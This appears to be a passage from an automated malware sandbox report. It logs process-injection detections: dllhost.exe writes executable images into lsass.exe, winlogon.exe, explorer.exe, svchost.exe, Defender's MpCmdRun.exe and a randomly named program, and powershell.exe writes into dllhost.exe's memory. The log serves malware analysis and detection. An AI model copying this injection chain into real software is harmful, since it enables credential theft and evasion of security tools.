Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 3080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\notepad.exe base: 1CB53D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 14F1CC80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1498BC10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 162FA3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BAD1DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\ProgramData\SVrB5SO0.exe base: 2BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1D186B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E06B060000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe

Memory written: PID: 3964 base: 9D50000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: target process: 1156

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 72EF141010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 18AF9660000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 2D6CEB40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2566C210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1A529D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 219CA930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D42C7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CB5EA90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15D2A5D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 217A5190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 163A9860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EA17CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 286D60C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2355A1A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C8C17A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CC85180000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E23A7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 218029B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2275E2F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 10619B50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 242BD150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E0C0590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C68DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2603EBB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19ABD960000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E94DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18C3C1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2893F330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 278C0860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18874FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13D0CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C8F7DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1740E110000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EDAA480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA8C3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 216D6E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29689780000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15DD2FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22832B90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2FC70BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19D1DCE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5D0E60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2399D0C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1F8BAA00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2189A1C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D1DA50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD15F80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 2B9227D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 291C69D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24C9F940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205CD000000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F65EF00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E3D7590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1DABD3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21982950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C0A7D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 223E6FB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1826DF40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 23288C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A9D350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EC646A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 21E5DAF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F336730000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 179623A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1837C750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19B03480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2136CAD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1638A820000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1EF0EA80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1EC32EF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A20EED0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1A99C4F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 3080000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 12F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 3070000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 16C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1290000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: C90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 27A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1460000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1490000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: A90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: CC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: C80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 26A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2500000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 28A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2410000
